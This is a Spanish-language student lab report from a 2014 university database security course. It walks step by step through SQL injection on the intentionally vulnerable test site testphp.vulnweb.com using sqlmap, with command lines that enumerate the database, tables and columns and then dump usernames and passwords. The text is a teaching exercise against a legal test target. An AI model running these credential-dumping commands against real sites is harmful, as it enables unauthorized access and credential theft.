Seguridad En Bases De Datos

Practica 1-Inyeccion SQL a sitio

web
Presentado por: Carlos Orlando Daz
Tutor: Jess Emiro Vega

Escuela de Ciencias Bsicas , tecnologa e
ingeniera
UNAD - 2014

Inicialmente ingresamos Al sitio
web a atacar, en este Caso
http://testphp.vulnweb.com
Igual que en el ejercicio
De Badstore inicialmente
Buscamos la versin de la Base
de datos son la siguiente Lnea:

C:\sqlmap>sqlmap.py -u
"http://testphp.vulnweb.com/searc
h.php?test=query" b
Para conocer el nombre
De la base de datos
Utilizamos la siguiente
Lnea de comandos:

C:\sqlmap>sqlmap.py -u
"http://testphp.vulnweb.com/
search.php?test=query"
currentdb

En este caso la base de
datos se denomina acuart
Para conocer las tablas de la base
De datos digitamos la siguiente
lnea De comandos:

C:\sqlmap>sqlmap.py -u
"http://testphp.vulnweb.com/search
.php?test=query" D acuart --
tables
Para conocer las columnas
De la tabla users
Utilizamos la siguiente lnea
De comandos:

C:\sqlmap>sqlmap.py -u
"http://testphp.vulnweb.com/
search.php?test=query" D
acuart T users -- columns

Asi podremos conocer el
nombre de usuario y la
Contrasea de los usuarios
Registrados en el sitio
Para conocer el nombre de usuario
se utiliza la siguiente linea de
comandos

C:\sqlmap>sqlmap.py -u
"http://testphp.vulnweb.com/search.
php?test=query" D acuart T users
C name --dump

En este caso nos arroja la
informacin del nombre de usuario
Para conocer el nombre de
usuario se utiliza la siguiente
linea de comandos

C:\sqlmap>sqlmap.py -u
"http://testphp.vulnweb.com/se
arch.php?test=query" D
acuart T users C pass --
dump

En este caso nos arroja la
informacin de la contrasea
Del usuario.
Referencias Bibliogrficas
http://blog.elhacker.net/2014/06/sqlmap-automatizando-ataques-sqli-injection.html
http://www.youtube.com/watch?v=5DCqk0l0IoY
http://www.youtube.com/watch?v=yU9bUb026_4
http://www.hacktimes.com/sql_injection_con_sqlmap/